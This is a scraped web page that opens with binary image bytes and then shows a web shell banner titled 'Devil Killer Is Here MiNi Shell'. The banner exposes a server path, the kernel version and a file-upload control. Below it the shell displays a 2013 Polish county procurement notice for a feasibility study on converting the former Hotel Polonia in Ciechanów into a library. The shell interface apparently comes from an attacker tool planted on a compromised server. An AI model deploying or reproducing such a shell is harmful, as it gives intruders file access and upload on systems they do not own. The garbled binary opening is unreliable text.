JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130709/138121-N-2013.html

<p class="kh_header"><b>Ciechanów: Opracowanie Studium Wykonalności  i sporządzenie analizy oddziaływania na środowisko  Przebudowy elewacji wraz ze zmianą sposobu użytkowania budynku dawnego hotelu POLONIA z adaptacją na cele upowszechniania kultury, w tym na potrzeby Powiatowej Biblioteki Publicznej.</b><br>
<b>Numer ogłoszenia: 138121 - 2013; data zamieszczenia: 09.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Ciechanowski , ul. 17 Stycznia 7, 06-400 Ciechanów, woj. mazowieckie, tel. 023 6723485, 6725415, faks 023 6722945.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ciechanow.powiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie Studium Wykonalności  i sporządzenie analizy oddziaływania na środowisko  Przebudowy elewacji wraz ze zmianą sposobu użytkowania budynku dawnego hotelu POLONIA z adaptacją na cele upowszechniania kultury, w tym na potrzeby Powiatowej Biblioteki Publicznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie Studium Wykonalności  i sporządzenie analizy oddziaływania na środowisko  Przebudowy elewacji wraz ze zmianą sposobu użytkowania budynku dawnego hotelu POLONIA z adaptacją na cele upowszechniania kultury, w tym na potrzeby Powiatowej Biblioteki Publicznej.

Lokalizacja obiektu - Ciechanów, ul. Warszawska 34 , działka nr 333/2  m. Ciechanów obręb Śródmieście.
Obiekt został wpisany do rejestru zabytków przez Mazowieckiego Wojewódzkiego Konserwatora Zabytków w Warszawie na podstawie decyzji DC. 5140.62.2013 nr 386/2013 z dnia 15 kwietnia 2013 roku.

Obiekt posiada sporządzoną inwentaryzację, ekspertyzę  techniczną i projekt przebudowy wraz ze zmianą sposobu użytkowania z adaptacją na cele upowszechniania kultury. Budynek jest nie użytkowany od kilkunastu lat.

Opracowanie musi być  zgodne z Wytycznymi do przygotowania Studium Wykonalności do projektu w ramach Programu Konserwacja i rewitalizacja dziedzictwa kulturowego Mechanizmu Finansowego EOG 2009-2014  oraz Norweskiego Mechanizmu Finansowego 2009-2014.

Najważniejszymi celami Studium Wykonalności są:
-Pokazanie zasadności realizacji projektu.
-Określenie  czy zadanie możliwe jest do zrealizowania.
-Wskazanie  najlepszych z możliwych  do zastosowania rozwiązań technicznych, technologicznych, organizacyjnych, finansowo-ekonomicznych.
-Uzasadnienie wyboru opcji , której realizacji doprowadzi  do rozwiązania, zdiagnozowanych problemów
-Określenie korzyści i kosztów  realizacji projektu.
-Określenie optymalnej wysokości dotacji z Mechanizmu Finansowego BOG i Norweskiego Mechanizmu Finansowego

Struktura dokumentu:
1.Charakterystyka Wnioskodawcy.
2. Określenie przedmiotu studium.
3. Opis projektu (w tym cele projektu - wskaźniki, lokalizacja, oddziaływanie projektu).
4. Opis istniejącego systemu
5. Analiza popytu (wraz z opisem programu kulturowego)
6. Definiowanie  ostatecznego zakresu
7. Analiza oddziaływania na środowisko
8. Plan wdrażania i funkcjonowania projektu (harmonogram, plan finansowania, trwałość,  działania promocyjne
9. Analiza finansowa
10. Analiza ekonomiczna
11. Analiza wrażliwości i ryzyka 

W powyższych punktach należy podać, co następuje:
1.Charakterystyka Wnioskodawcy- należy podać wszystkie dane podmiotu składającego wniosek określone w części I Wytycznych.
2.Określenie przedmiotu studium -  należy podać tytuł przedsięwzięcia oraz wyjaśnić co jest przedmiotem Studium Wykonalności. Tytuł powinien w jednoznaczny sposób określać cele projektu i identyfikować jednoznacznie obszar na którym projekt będzie wdrażany. Tytuł winien być identyczny z tytułem użytym we wniosku i dokumentacji aplikacyjnej.
3.Opis projektu (w tym cele projektu - wskaźniki, lokalizacja, oddziaływanie projektu) Opis musi zawierać następujące informacje:  geneza projektu, opis przedmiotu projektu, ranga obiektu objętego projektem (np. rejestr zabytków), określenie grup docelowych do których kierowany jest projekt, uzasadnienie zgodności projektu z celami  Mechanizmów Finansowych i Programu, uzasadnienie potrzeby realizacji projektu. 

Określenie celów projektu - logika interwencji:
Cele projektu zdefiniowane w analizie muszą:
-jasno wskazywać  jakie korzyści społeczno-ekonomiczne można osiągnąć dzięki  wdrożeniu projektu,
-być logicznie  powiązane ze  sobą,
-uwzględniać wszystkie najważniejsze bezpośrednie i pośrednie skutki społecznoekonomiczne przedsięwzięcia,
-określać,  czy całkowite korzyści osiągnięte w wyniku realizacji projektu uzasadniają jego koszt,
-być logicznie powiązane  z ogólnymi celami omawianych funduszy,
-być uzupełnione o metody pomiaru poziomu ich osiągnięcia,
-określać korzyści  osiągnięte w ramach  danego celu powinny być wyrażone  w konkretnych wartościach/parametrach  społeczno - ekonomicznych.

Cele projektu muszą być określone poprzez wskaźniki na dwóch  poziomach
-wyniku (produktu) - to bezpośredni efekt projektu. Wszystkie wyniki muszą być mierzalne i osiągnięte najpóźniej do końca realizacji projektu,
-rezultatu - planowane efekty projektu mierzone po zakończeniu jego realizacji, takie jak np. liczba turystów odwiedzających dany obiekt w ciągu roku. 
Wszystkie rezultaty muszą być mierzalne i osiągnięte najpóźniej w rok od końca realizacji projektu. Na poziomie Wytycznych nie określono katalogu obowiązkowych wskaźników rezultatu - należy je określić indywidualnie dla każdego z projektów.
Wskaźniki wyniku (produktu)- pkt 4.3 wniosku aplikacyjnego:
-Liczba odrestaurowanych i odnowionych obiektów kulturalnych.
-Liczba obiektów dziedzictwa kulturowego zabezpieczonych przed degradacją.
-Liczba udostępnionych lub ponownie udostępnionych historycznych obiektów kulturalnych.
-Liczba nowych serwisów internetowych prezentujących udokumentowane cyfrowo zbiory dziedzictwa kulturowego.
-Liczba zdygitalizowanych zbiorów dziedzictwa kulturowego.
-Liczba nowo utworzonych muzeów i obiektów kulturalnych,
-Liczba utworzonych wirtualnych instytucji kultury.
-Liczba obiektów kulturalnych dostosowanych do potrzeb osób niepełnosprawnych.
-Udostępniona powierzchnia obiektów objętych projektem ( m2).
-Liczba nowych miejsc pracy
-Liczba instytucji partnerskich (z Państw Darczyńców) zaangażowanych w realizację projektu.
-Inne - istnieje możliwość dodania  kolejnych wskaźników, jeśli wskaźniki z wniosku nie wyczerpują zakresu i specyfiki projektu.
 
Lokalizacja  oraz planowany obszar  oddziaływania projektu - Informacje na temat obszaru, na którym zlokalizowany jest projekt należy pokazać w taki sposób, aby można było łatwo zauważyć i zrozumieć problemy, które realizacja projektu ma rozwiązać.  
Konieczne jest określenie wraz z uzasadnieniem obszaru oddziaływania projektu (międzynarodowy, ogólnopolski, regionalny/lokalny):
-przed rozpoczęciem realizacji inwestycji (jeśli projekt dotyczy istniejącego obiektu),
-planowanego (dotyczy wszystkich typów)

4.Opis istniejącego systemu. Należy przedstawić informacje na temat:
-zdolności organizacyjnej i finansowej Wnioskodawcy do wdrożenia projektu. Jeżeli Wnioskodawca planuje  powierzenie realizacji projektu inwestorowi zastępczemu jest zobowiązany przedstawić informację na temat wybranej firmy lub informacji na temat trybu wyboru. W tej części Studium Wykonalności  należy zawrzeć również informacje o zrealizowanych projektach inwestycyjnych o wartości przekraczającej 1 milion złotych,
-prawnej wykonalności inwestycji- kwestii prawnych związanych z realizacją projektu, w tym stanu formalno-prawnego nieruchomości, gruntów, dokumentów warunkujących wykonanie inwestycji,
-opisu technicznego - stanu  aktualnego przedmiotu projektu - określenie stanu budynków, budowli i innych przedmiotów projektu,
-zidentyfikowanych problemów,
-oceny istniejącego systemu pod kątem zgodności z prawem polskim i UE, w tym:
-zgodność z polityką rządową/regionalną,
-zgodność z politykami i prawem wspólnotowym ( w zakresie pomocy publicznej, zamówień publicznych,  równości szans oraz mniejszości narodowych i etnicznych w projekcie)

Należy dołączyć dokumentację zdjęciową.

5.Analiza popytu (wraz z opisem programu kulturowego)
-Zdefiniowanie obszaru objętego analizą popytu - identyfikacja beneficjentów końcowych projektu oraz określenie ich potrzeb kulturalnych/edukacyjnych,
-Bieżący i przyszły popyt zgłaszany na produkty/usługi objęte projektem:
-- Bieżący popyt - określenie jakie jest zainteresowanie w chwili obecnej korzystaniem z rezultatów projektu.
-- Przyszły popyt -  realne prognozy określające  przyszłe zainteresowanie produktami/usługami  oferowanymi przez zrealizowany projekt.
-Program kulturowy/oferta edukacyjna - zarówno obecna oferta i program bezpośrednio powiązany z wnioskowaną inwestycją

Analizy powinny być oparte  o obiektywne dane zewnętrzne (w odniesieniu do bieżącego  popytu)  lub potwierdzone wykonaniem konkretnych badań określających zapotrzebowanie  na dany projekt ( w odniesieniu do przyszłego popytu).

6.Definiowanie  ostatecznego zakresu.
Należy przedstawić analizy w zakresie:
-potrzeb inwestycyjnych
-opcji technicznych - należy zidentyfikować następujące warianty:
-- wariant bezinwestycyjny,
-- wariant minimum,
--  warianty inwestycyjne - co najmniej dwa, w przypadku projektów z zakresu  
renowacji obiektów zabytkowych - jeden.

Przedstawienie argumentów w celu wykazania, że wybrany wariant  realizacji projektu reprezentuje najlepsze rozwiązanie spośród wszelkich możliwych alternatywnych  rozwiązań umożliwiających osiągnięcie celu.

7.Analiza oddziaływania na środowisko - Należy opisać przebieg procedury przeprowadzonej w celu uzyskania decyzji o  środowiskowych uwarunkowaniach (jeśli dotyczy) oraz uzyskaną w jej wyniku dokumentację  stanowiącą załącznik do wniosku o dofinansowanie, w szczególności:
-Wniosek do właściwego organu o wydanie decyzji środowiskowej,
-Postanowienie organu odnośnie konieczności przeprowadzenia  postępowania OOŚ,
-Raport OOŚ (jeśli jest wymagany),
-Decyzja o środowiskowych uwarunkowaniach,
-Streszczenie raportu OOŚ - jeżeli Ocena Oddziaływania na Środowisko (OOŚ) jest wymagana. Należy opisać również przebieg procedury oceny w sprawie oddziaływania projektu na obszary Natura 2000 (jeśli dotyczy),
Gdy OOŚ nie jest wymagana opis tej części studium powinien zawierać informacje odnośnie tego, czy projekt może spowodować
-zagrożenie dla środowiska w fazie budowy/realizacji
-zagrożenie dla środowiska w fazie eksploatacji projektu.

8.Plan wdrażania i funkcjonowania projektu (harmonogram, plan finansowania, trwałość,  działania promocyjne. Harmonogram realizacji projektu  w postaci wykresu Gantta w podziale na lata i trymestry zgodnie ze wzorem wskazanym w Wytycznych. W tabeli należy odrębnie wykazać wszystkie (przewidywane) zamówienia oraz wszystkie (przewidywane) umowy kontraktowe.
Plan finansowania  (preliminarz) - musi być spójny z harmonogramem realizacji projektu, wnioskiem aplikacyjnym, a także zawierającą kwoty netto i brutto tabelą scalającą kosztorysy inwestorskie i wykonany nie wcześniej niż 6 miesięcy przed datą złożenia wniosku.
Ocena długoterminowej trwałości finansowo- instytucjonalnej projektu - informacja na temat posiadanych przez jednostkę prowadzącą niezbędnych zasobów do prawidłowego utrzymania i eksploatacji projektu przez okres 5 lat po zakończeniu realizacji projektu.
Wnioskodawca jest zobowiązany do przedstawienia (ze wskazaniem źródeł finansowania);
- kosztów utrzymania instytucji/obiektu w ciągu 5 lat poprzedzających rok złożenia wniosku,
- szacowanych kosztów utrzymania instytucji/obiektu objętego projektem w ciągu 5 lat po zakończeniu jego realizacji.
Informacja i promocja - W Studium Wykonalności należy określić:
- cel jaki ma być osiągnięty poprzez podjęte działania promocyjne,
- grupy docelowe do jakich planowane działania promocyjne będą skierowane,
- metody realizacji działań,
- jednostkę odpowiedzialną za ich realizację,
- podać szacowany budżet i źródło finansowania.

9.Analiza finansowa. Celem analizy finansowej jest dokonanie oceny finansowej rentowności inwestycji. W ramach analizy finansowej należy dokonać kalkulacji wartości wskaźników efektywności finansowej projektu:
-FNPV/C - finansowa bieżąca wartość netto inwestycji,
-FRR/C - finansowa wewnętrzna stopa zwrotu z inwestycji,
-FNPV/K - finansowa bieżąca wartość netto kapitału,
-FRR/K - finansowa wewnętrzna stopa zwrotu z kapitału.
Wyliczenie wskaźników analizy finansowej należy dokonać przy zastosowaniu stopy dyskontowej na poziomie 5,5 % oraz okresu odniesienia 20 lat.

Zastosowanie metody kalkulacji Luki w dofinansowaniu - Cel:
-Określenie poziomu wydatków kwalifikowanych, który gwarantuje, że projekt będzie miał wystarczające zasoby finansowe na jego realizację,
-Uniknięcie przyznania nienależnych korzyści odbiorcy.
Metodę luki w dofinansowaniu projektów generujących dochód stosuje się jeżeli :
-Wsparcie nie stanowi pomocy publicznej w rozumieniu art. 107 TFUE,
-Wartość bieżąca przepływów pieniężnych netto generowanych w ramach projektu jest dodatnia.

     Algorytm kalkulacji maksymalnej  kwoty dofinansowania metoda Luki w dofinansowaniu:
     Wskaźnik luki finansowej (R)

                                       MaxEE
               R =            ----------------------
                                          DIC
 
     DIC - zdyskontowany koszt inwestycji
     MaxEE - maksymalny wydatek kwalifikowany = DIC- DNR
     DNR - zdyskontowany przychód netto = zdyskontowane przychody  - 
                zdyskontowane koszty operacyjne+ zdyskontowana wartość rezydualna

    Algorytm  kalkulacji maksymalnej kwoty dofinansowania metoda Luki w 
    dofinansowaniu:
    Określenie kwoty decyzji (DA)

                DA = EC  x  R
 
   EC- koszty kwalifikowane (niezdyskontowane)

   Algorytm kalkulacji maksymalnej kwoty dofinansowania metoda Luki w 
   dofinansowaniu:
   Określenie maksymalnej dotacji UE

                Dotacja UE = DA  x MaxCRpa

    MaxCRpa - maksymalny poziom współfinansowania osi priorytetowej określony przez KE 
    w decyzji przyjmującej program (np. 85 %)


10.Analiza ekonomiczna - Celem analizy jest ocena oczekiwanego wpływu projektu na obszar społeczno - gospodarczy, na który oddziaływać będzie projekt. Za pomocą analizy ekonomicznej dąży się do sprawdzenia czy inwestycja jest uzasadniona z punktu widzenia całej społeczności. Podstawa do przeprowadzenia analizy ekonomicznej są przepływy środków pieniężnych określone w analizie finansowej. Przy określeniu ekonomicznych wskaźników efektywności należy jednak dokonać niezbędnych korekt dotyczących:
-efektów fiskalnych (transferów),
-efektów zewnętrznych,
-przekształceń z cen rynkowych na ceny rozrachunkowe.
        
Dla wyliczenia wskaźników analizy ekonomicznej zaleca się stosowanie społecznej stopy dyskontowej na poziomie 5,5 % oraz okresu odniesienia 20 lat. Ekonomiczne wskaźniki efektywności projektu:
-ekonomiczna wartość bieżąca netto (ENPV),
-ekonomiczna stopa zwrotu (ERR),
-relacja korzyści do kosztów (B/C).
Czynniki społeczno- gospodarcze, których nie da się wyrazić w wartościach  pieniężnych, należy opisać ilościowo i jakościowo z uwzględnieniem wszystkich istotnych społecznych, ekonomicznych i środowiskowych skutków realizacji projektu.

11.Analiza wrażliwości i ryzyka 
Etapy analizy wrażliwości:
-identyfikacja zmiennych mających wpływ na wyniki projektu,
-wyeliminowanie zmiennych zależnych, które są pochodną innych zmiennych wykorzystywanych w analizie,
-analiza elastyczności, polegająca na subiektywnej ocenie zmiennych  i odrzucenie tych,  których wyrażona w procentach zmiana wartości ma niewielki wpływ na wskaźniki efektywności projektu,
-wybór zmiennych krytycznych tj. takich które mają wpływ na wyniki projektu i uszeregowanie ich w formie rankingu,
-analiza scenariuszy, polegająca na badaniu na podstawie realistycznych scenariuszy wpływu na wyniki projektu wielu zestawu zmiennych krytycznych jednocześnie.
 Analiza ryzyka -  ocena wpływu jaki wywiera procentowa zmienna zmiennej na wskaźnik efektywności projektu. Ma ona na celu określenie rozkładu prawdopodobieństwa zmiennych krytycznych (przypisanie odpowiednich rozkładów prawdopodobieństwa  zmiennych krytycznych w oparciu o dane historyczne, własne doświadczenie, bądź wiedzę ekspercką). Należy także zidentyfikować ryzyka jakościowe, których wpływ na wskaźniki efektywności  projektu nie da się jednoznacznie skwalifikować ( w tym zdarzenia losowe, możliwe  problemy, które mogą wystąpić podczas realizacji inwestycji np. znaleziska archeologiczne,  problemy organizacyjne, prawne). W  takim przypadku należy określić prawdopodobieństwo ich wystąpienia.

Dokument winien zostać opracowany  w ilości 4 egz. w wersji papierowej oraz w wersji elektronicznej - edytowalnej  - format doc (MS Word), xls (MS Exel).

Wykonawca będzie zobowiązany do aktualizacji Studium Wykonalności  będącego przedmiotem zamówienia, w przypadku zaistnienia takiej konieczności, do czasu uzyskania przez Zamawiającego pozytywnej oceny opracowanego w oparciu o Studium Wykonalności projektu dokonanej przez  właściwy podmiot..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.10.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na podstawie przedłożonych dokumentów i oświadczeń dokona oceny spełniania warunków określonych w art.22 ust. 1 pzp metodą spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże  wykonanie co najmniej trzech Studiów Wykonalności  w zakresie inwestycji z zakresu kultury i dziedzictwa narodowego, które uzyskały dofinansowanie projektu  i załączy dokumenty potwierdzające  że zostały  wykonane w sposób należyty,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełnienia warunku Zamawiający dokona na podstawie dokumentów potwierdzających opłacenie przez Wykonawcę polisy ubezpieczeniowej   od odpowiedzialności  cywilnej z tytułu  prowadzonej działalności  gospodarczej na co najmniej kwotę 15 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
